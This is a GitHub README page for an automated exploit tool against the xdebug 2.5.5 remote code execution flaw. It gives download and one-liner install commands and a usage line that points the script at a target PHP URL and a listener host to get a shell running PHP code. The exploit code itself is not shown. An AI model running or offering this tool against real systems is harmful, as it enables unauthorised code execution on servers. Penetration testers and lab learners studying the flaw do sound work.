GitHub - D3Ext/XDEBUG-Exploit: xdebug 2.5.5 RCE exploit

 __  _____  ___ ___ _   _  ___   ___          _     _ _   
 \ \/ /   \| __| _ ) | | |/ __| | __|_ ___ __| |___(_) |_ 
  >  <| |) | _|| _ \ |_| | (_ | | _|\ \ / '_ \ / _ \ |  _|
 /_/\_\___/|___|___/\___/ \___| |___/_\_\ .__/_\___/_|\__|
                                        |_|

An automated exploit to the xdebug 2.5.5 RCE vulnerability

Download:

Download from package

pip3 install xdebug-exploit

Download from source

git clone https://github.com/D3Ext/XDEBUG-Exploit
cd XDEBUG-Exploit
python3 xdebug.py

One-Liner

git clone https://github.com/D3Ext/XDEBUG-Exploit && cd XDEBUG-Exploit && pip3 install requirements.txt && python3 xdebug.py

Usage:

To exploit a target using a vulnerable version (v2.5.5) you have to especify the URL of a php file of the web page(Example: http://10.10.10.83/index.php) and also especify the LHOST (Example: 10.10.x.x)

python3 xdebug.py -u http://10.10.10.83/index.php -l 10.10.16.3

And if the target is vulnerable, the exploit starts a fake-shell to execute php code.

*(In some cases the output won't be perfect and you only will see the first line of the executed command, this is not a problem of the script, the vuln is like this)*

Demo:

If you consider this project has been useful, I would really appreciate supporting me by giving this repo a star or buying me a coffee.

Name		Name	Last commit message	Last commit date
Latest commit History 14 Commits
LICENSE		LICENSE
README.md		README.md
requirements.txt		requirements.txt
xdebug.png		xdebug.png
xdebug.py		xdebug.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Download:

Usage:

Demo:

About

Releases

Languages

License

D3Ext/XDEBUG-Exploit

Folders and files

Latest commit

History

Repository files navigation

Download:

Usage:

Demo:

About

Topics

Resources

License

Stars

Watchers

Forks

Releases

Languages